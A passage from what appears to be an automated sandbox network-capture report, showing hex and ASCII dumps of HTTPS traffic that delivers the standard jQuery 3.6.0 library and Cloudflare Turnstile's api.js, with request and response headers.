                                                                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                            2024-12-21 23:46:43 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                            2024-12-21 23:46:43 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                            2024-12-21 23:46:43 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                            2024-12-21 23:46:43 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                            2024-12-21 23:46:43 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                            2024-12-21 23:46:43 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                            2024-12-21 23:46:43 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                            2024-12-21 23:46:43 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                            2024-12-21 23:46:43 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.449755104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:45 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:45 UTC471INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:45 GMT
                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                            Content-Length: 47692
                                                                                                            Connection: close
                                                                                                            accept-ranges: bytes
                                                                                                            last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                            access-control-allow-origin: *
                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0d95cf943d4-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:45 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                            Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                            Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                            Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                            Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                            2024-12-21 23:46:45 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                            Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
